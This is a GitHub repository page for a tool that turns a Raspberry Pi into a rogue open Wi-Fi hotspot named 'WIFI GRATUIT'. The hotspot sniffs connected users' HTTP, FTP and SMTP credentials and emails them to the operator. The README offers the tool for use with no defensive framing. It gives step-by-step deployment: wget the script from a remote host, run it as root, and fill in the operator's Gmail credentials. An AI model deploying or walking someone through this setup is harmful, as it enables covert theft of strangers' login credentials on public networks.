Skip to content

Create a RogueAP with one script. You just need a RPi3 and a wifi card

License

Notifications You must be signed in to change notification settings

TrustMe00/RogueAP-PwnBox

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

RogueAP PwnBox

The project goal is to build a Rogue AP who can intercept credentials like HTTP authentification, FTP, SMTP ... The version 1 of the script setup an open access point named "WIFI GRATUIT". In the background a sniffer intercept all traffic and send you an email when the program get credentials. alt text

Prerequisites

Please before install the RogueAP make a proper install of Raspbian To enable all functionnality like email alert you need to edit the script :

210 - [email protected]
211 - [email protected]
212 - gmailpwd=PASSWORD

To install this RogueAP you just need the following stuff :

A Raspberry PI 3
An alfa network AWUS036NH
Raspbian Jessie or Stretch

Installing

1 - Download the script

wget https://raw.githubusercontent.com/Thomas-Clauzel/RogueAP-PwnBox/master/RogueAP.sh

2 - Make it executable

sudo chmod+x RogueAP.sh

3- Run the script as root

sudo ./RogueAP.sh

4 - Reboot the raspberry PI

reboot

Built With

About

Create a RogueAP with one script. You just need a RPi3 and a wifi card

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages